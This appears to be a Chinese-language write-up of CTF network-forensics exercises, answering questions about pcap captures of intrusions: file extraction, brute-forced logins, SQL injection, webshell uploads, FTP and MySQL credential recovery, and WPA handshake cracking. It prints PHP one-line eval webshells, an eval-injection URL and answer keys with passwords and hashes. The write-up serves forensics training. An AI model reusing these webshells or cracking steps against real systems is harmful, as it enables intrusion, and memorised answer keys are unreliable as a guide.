5.7 流量分析1/流量分析.pcapng5.7 流量分析2/流量分析2.pcapng5.7 流量中的线索/src/流量中的线索.pcapng5.7 数据提取/菜刀666666.pcapng5.7 第一套/题目/webone.pcap 和 webtwo.pcapQ1:请分析webone.pcap流量,给出黑客使用的扫描器Q2:请分析流量,得到黑客扫描到的登陆后台是(相对路径即可)Q3:请分析流量,得到黑客使用了什么账号密码登陆了web后台(形式:username/password)Q4:请分析流量,得到黑客上传的webshell文件名是,内容是什么,提交webshell内容的base编码Q5:请分析流量,黑客在robots.txt中找到的flag是什么Q6:请分析流量,黑客找到的数据库密码是多少Q7:请分析流量,黑客在数据库中找到的hash_code是什么Q8:请分析流量,黑客破解了账号[email protected]得到的密码是什么5.13 第二套Q1:黑客攻击的第一个受害主机的网卡IP地址Q2:黑客对URL的哪一个参数实施了SQL注入Q3:第一个受害主机网站数据库的表前缀(加上下划线 例如abc_)Q4:第一个受害主机网站数据库的名字Q5:Joomla后台管理员的密码是多少Q6:黑客第一次获得的php木马的密码是什么Q7:黑客第二次上传php木马是什么时间Q8:第二次上传的木马通过HTTP协议中的哪个头传递数据Q9:内网主机的mysql用户名和请求连接的密码hash是多少(用户:密码hashQ10:php代理第一次被使用时最先连接了哪个IP地址Q11:黑客第一次获取到当前目录下的文件列表的漏洞利用请求发生在什么时候Q12:黑客在内网主机中添加的用户名和密码是多少Q13:黑客从内网服务器中下载下来的文件名5.13 第五套Q1:黑客的IP地址是什么Q2:服务器1.99的web服务器使用的CMS及其版本号(请直接复制)Q3:服务器拿到的webshell的网址(请输入url解码后的网址)Q4:服务器1.99的主机名Q5:网站根目录的绝对路径(注意最后加斜杠) Q6:黑客上传的第一个文件名称是什么Q7:黑客进行内网扫描,扫描的端口都有哪些(端口从小到大,用英文逗号分隔)Q8:服务器2.88的ftp服务账号密码(格式:账号/密码)Q9:黑客成功登陆ftp的时间(格式:10:15:36)Q10:黑客在ftp中下载的敏感文件名称是什么Q11:服务器2.88中用户名为admin_zz的web后台管理员的密码Q12:服务器2.88的mysql账号密码(格式:账号/密码)Q13:服务器2.88的mysql服务中有和admin有关的三个表,请按照黑客的查询顺序作答,使用空格分隔Q14:请列出黑客设置的genreal log的绝对路径(将路径复制出来,区分大小写)Q15:路由器的品牌、型号、版本(请直接复制粘贴)Q16:列出路由器的所有IP地址(格式:从小到大,用英文逗号分隔)Q17:在路由器的端口监控中,监控端口和被监控端口分别是多少,例,1号端口监控2/3/4号端口:1–>2,3,4Q18:路由器一共有几个接口?其中有几个WAN口启用?有几个LAN口启用(格式:用英文逗号分隔)Q19:路由器的系统路由表中一共有几条?第三条的子网掩码是多少。例: 255 255.255.0则为24 (格式:用英文逗号分隔)Q20:路由器的5Gwif名称是什么,信道是多少(格式:名称信道)5.13 第三套/入门题/wifi.cap
5.7 流量分析1/流量分析.pcapng
1f 8b 08 tar.gz 的文件开头
分析 1305 的数据包
注意里面有个
%2B,是 + 的 URL编码,然后 base64解码得得知是下载文件
则他的返回包为下载的文件,首先选中返回的数据包,右键 Line-based text data 部分,选择 Show Packet Bytes(显示包字节流)

选择 Show as Hex Dump

依次调整 Start 为8,刚好是文件头 1f 8b 08 tar.gz 的文件头,选择 Decode as 为 Compressed即可获取到 flag

5.7 流量分析2/流量分析2.pcapng
89 50 4e png文件头


5.7 流量中的线索/src/流量中的线索.pcapng
ff d8 ff e0 是 jpg/jpeg 的文件头




5.7 数据提取/菜刀666666.pcapng
50 4b 03 04 zip压缩包头


奇怪,保存后打不开,提示损坏

直接 export 是可以的,发现需要密码

往上翻发现上传了一张图片 FFD8FFE0 jpg 文件头

导出来后,把16进制转原始二进制即可

得到压缩包密码:
Th1s_1s_p4sswd_!!!,解压缩即可
5.7 第一套/题目/webone.pcap 和 webtwo.pcap
数据包分析的一般步骤
1、协议分析

2、统计IP地址
3、统计端口情况
4、根据题目要求,分析要深入研究的协议

Q1-Q6 分析数据包 webone.pcap,Q7-Q8 分析数据包 webtwo.pcap
Q1:请分析webone.pcap流量,给出黑客使用的扫描器
一般扫描器扫描会充斥着大量的404返回状态码,所以
发现
ip.addr == 192.168.94.59 请求时间很密集,而且存在大量的 404 返回状态码,追踪 http 流发现,请求的数据包是攻击数据包。所以进一步筛选
所以用到的扫描器是
A1:AWVS
Q2:请分析流量,得到黑客扫描到的登陆后台是(相对路径即可)
直接筛选 http 包,发现正常用户的登录接口是
/admin/login.php?rec=login
攻击者的IP也利用此接口爆破

因此黑客扫描到的登陆后台是
A2:/admin/login.php?rec=login
Q3:请分析流量,得到黑客使用了什么账号密码登陆了web后台(形式:username/password)

发现 728915 和 733519 的返回包 Location 是 http://192.168.32.189/admin/index.php,其他是 http://192.168.32.189/admin/login.php ,说明这两个是登录成功的
追踪 728915 的http流发现(追踪 733519 http流发现密码和这个是一样的,只不过加了 url 编码,应该是从页面上登录的)

账号密码为
A3:admin/admin!@#pass123
Q4:请分析流量,得到黑客上传的webshell文件名是,内容是什么,提交webshell内容的base编码
没啥有用的
搜一下一句话关键字 eval

发现马是 a.php ,搜一下文件名
发现第一次请求是 GET

找一下包编号小于GET请求的
发现没在前面一部分数据包找到上传的,把 and http 也去掉,直接找 tcp就找到了

利用TCP的重传机制去把马上传上去的,这样直接筛选 http 就筛选不到了,不是完整的 http 协议流,这样确实可以一定程度上加大溯源难度
还有一种解法是,也是找到 a.php 文件,因为一般上传成功了,会去访问一下文件存不存在,所以一般是在 GET 访问的前面上传
跟踪 tcp 流

然后一条条向前找(注意是先向下的箭头)

最终在 71859 流找到了一句话的内容

得到webshell的内容是 <?php @eval($_POST[1234]);?>,base64编码后
A4:JTNDJTNGcGhwJTIwQGV2YWwlMjglMjRfUE9TVCU1QjEyMzQlNUQlMjklM0IlM0YlM0U=
Q5:请分析流量,黑客在robots.txt中找到的flag是什么
追踪搜索结果第一个数据包http流就能找到了

A5:flag:87b7cb79481f317bde90c116cf36084b
Q6:请分析流量,黑客找到的数据库密码是多少
发现有很多 404 的结果,进一步筛选
只有一个数据包,查看内容即可

A6:e667jUPvJjXHvEUv
Q7:请分析流量,黑客在数据库中找到的hash_code是什么
数据包主要是 MySQL 协议的

IP有两个,一个是客户端,一个是服务端

直接搜即可


A7:d1c029893df40cb0f47bcf8f1c3c17ac
Q8:请分析流量,黑客破解了账号[email protected]得到的密码是什么
直接搜即可

md5碰撞得(当然实际考试中不会出现这种需要用到在线网站的情况)

A8:edc123!@#
5.13 第二套
1.pcap-4.pcap
Q1:黑客攻击的第一个受害主机的网卡IP地址

找到第一个攻击数据包为SQL注入包,受害者IP为
A1:192.168.1.8
Q2:黑客对URL的哪一个参数实施了SQL注入
根据Q1,得知
A2:list[select]
Q3:第一个受害主机网站数据库的表前缀(加上下划线 例如abc_)
看到注入的返回包都是500,应该是报错了,追踪流可以看到表名和字段名之类的

当然也可以选择通过table_name之类的关键字过滤找,不过有报错栈这样更方便
A3:ajtuc_
Q4:第一个受害主机网站数据库的名字
发现这是一个报错注入,通常会利用 table_schema 获取数据库中的各个表名,那么第一个 table_schema=xxxx 就是第一个被利用的网站数据库名字

第一个请求数据包内容为
返回表有68个
第二个请求数据包
解码 0x6a6f6f6d6c61 可得
A4:joomla
Q5:Joomla后台管理员的密码是多少

updatexml 报错注入,每次能获取的字符是有限的,所以分3次获取,拼接后得到密文(考试加密的直接填就可以了)
A5:$2y$10$lXujU7XaUviJDigFMzKy6.wx7EMCBqpzrJdn7zi/8B2QRD7qIlDJe
2.pcap
Q6:黑客第一次获得的php木马的密码是什么

A6:zzz
Q7:黑客第二次上传php木马是什么时间

z1为文件名 footer.php z2为文件内容,通过16进制编码上传上去,内容为一句话,时间为
A7:17:20:44
Q8:第二次上传的木马通过HTTP协议中的哪个头传递数据
解码马和观察数据包得知
通过 refer 头传输数据
A8:HTTP_REFERER
3.pcap
Q9:内网主机的mysql用户名和请求连接的密码hash是多少(用户:密码hash

或者
在TCP追踪流即可
A9:1a3068c3e29e03e3bcfdba6f8669ad23349dc6c4
Q10:php代理第一次被使用时最先连接了哪个IP地址

A10:4.2.2.2
4.pcap
Q11:黑客第一次获取到当前目录下的文件列表的漏洞利用请求发生在什么时候

A11:18:37:00
Q12:黑客在内网主机中添加的用户名和密码是多少
发现查不到,可能是有大小写的缘故?换个姿势

往下找下一个 /install/sh.php

base64解码得到
发现是用户加组的
在往下是查看用户添加成功与否的结果

往上翻结果发现 kaka 用户是原本没有的!

也就是说下面的数据包中有一个是添加了kaka用户的

base64解码得
A12:kaka/kaka
Q13:黑客从内网服务器中下载下来的文件名
发现该请求包数据包下包有较多的断续回包

解码得下载路径为
A13:lsass.exe_180208_185247.dmp
5.13 第五套
注意这个题目有6个数据包,如果在某个数据包找不到可尝试换其他数据包
Q1:黑客的IP地址是什么
翻攻击数据包,主要是由该IP发出
A1:202.1.1.2
Q2:服务器1.99的web服务器使用的CMS及其版本号(请直接复制)
一般CMS及其版本号找网页页脚

A2:EasyTalk X2.0.1
Q3:服务器拿到的webshell的网址(请输入url解码后的网址)
webshell地址,答案中的是有问题的(要看请求包的 host 头,不要看 ip destination 这个是 内网的IP地址。)

A3:http://202.1.1.1/index.php/module/action/param1/${@print(eval($_POST[c]))}
Q4:服务器1.99的主机名
找phpinfo

A4:simplefight1
Q5:网站根目录的绝对路径(注意最后加斜杠)
找phpinfo DOCUMENT_ROOT

A5:/var/www/html/easytalk/
Q6:黑客上传的第一个文件名称是什么

z0为写入文件的php代码,z1为文件名,z2为文件内容(菜刀流量的特点就是文件上传有z2参数),base64解码z1即可
A6:/var/www/html/easytalk/scan.php
Q7:黑客进行内网扫描,扫描的端口都有哪些(端口从小到大,用英文逗号分隔)
由Q6上传的文件名,可以猜出黑客上传该文件是为了扫描端口,因此搜该文件名即可

A7:21,80,8080,1433,3306
Q8:服务器2.88的ftp服务账号密码(格式:账号/密码)

应该是这个ip了
思考🤔一下发现,数据包是攻击链的话,那么就是上面扫出的21端口,那么扫描的IP就是对应的IP,直接找IP也可以~

administrator/123456
或者直接搜FTP登录成功的状态码
接着追踪tcp流即可

A8:administrator/123456
Q9:黑客成功登陆ftp的时间(格式:10:15:36)
一般爆破成功的时间并不是登录成功的时间,因为爆破时是批量的,爆破成功后还有大量的失败数据包,所以一般是爆破成功的第二个数据包

即 14:07:15
A9:14:07:15
Q10:黑客在ftp中下载的敏感文件名称是什么

A10:config_db.php
Q11:服务器2.88中用户名为admin_zz的web后台管理员的密码

A11:1q2w3e4r
Q12:服务器2.88的mysql账号密码(格式:账号/密码)
查看ftp的传输数据可通过该筛选命令

A12:root/S1mp13zz
Q13:服务器2.88的mysql服务中有和admin有关的三个表,请按照黑客的查询顺序作答,使用空格分隔

A13:select * from met_admin_array select * from met_admin_column select * from met_admin_table
Q14:请列出黑客设置的genreal log的绝对路径(将路径复制出来,区分大小写)

或者是 mysql
A14:c:/phpStudy/WWW/config/config.php
下面这5个题目不是考试重点,在第1个数据包中 data-1_00001_20180205135424.pcap
Q15:路由器的品牌、型号、版本(请直接复制粘贴)
路由器一般ip是 192.168.0.1 (但不一定)

A15:TL-WAR1300L v1.0
Q16:列出路由器的所有IP地址(格式:从小到大,用英文逗号分隔)

A16:192.168.0.1,192.168.12.173,202.1.1.1
Q17:在路由器的端口监控中,监控端口和被监控端口分别是多少,例,1号端口监控2/3/4号端口:1–>2,3,4

A17:3->1,2
Q18:路由器一共有几个接口?其中有几个WAN口启用?有几个LAN口启用(格式:用英文逗号分隔)
同Q16的图
A18:5:2:2
Q19:路由器的系统路由表中一共有几条?第三条的子网掩码是多少。例: 255 255.255.0则为24 (格式:用英文逗号分隔)

A19:5,255.255.252.0
Q20:路由器的5Gwif名称是什么,信道是多少(格式:名称信道)

A20:test-ge1:36
5.13 第三套/入门题/wifi.cap
密码为手机号,为了不为难你,大佬特地让我悄悄地把前七位告诉你 1391040** Goodlick!!
打开数据包有很多 802.11 协议的数据包

Wi-Fi就是一个基于IEEE 802.11标准的无线局域网技术
WIFI连接认证的重点在WPA的四次握手包,也就是eapol协议的包

可以通过 aircrack-ng 工具爆破,先生成一个字典
爆破
选择需要爆破的WiFI,这里输入 3 回车即可

即可爆破得到手机号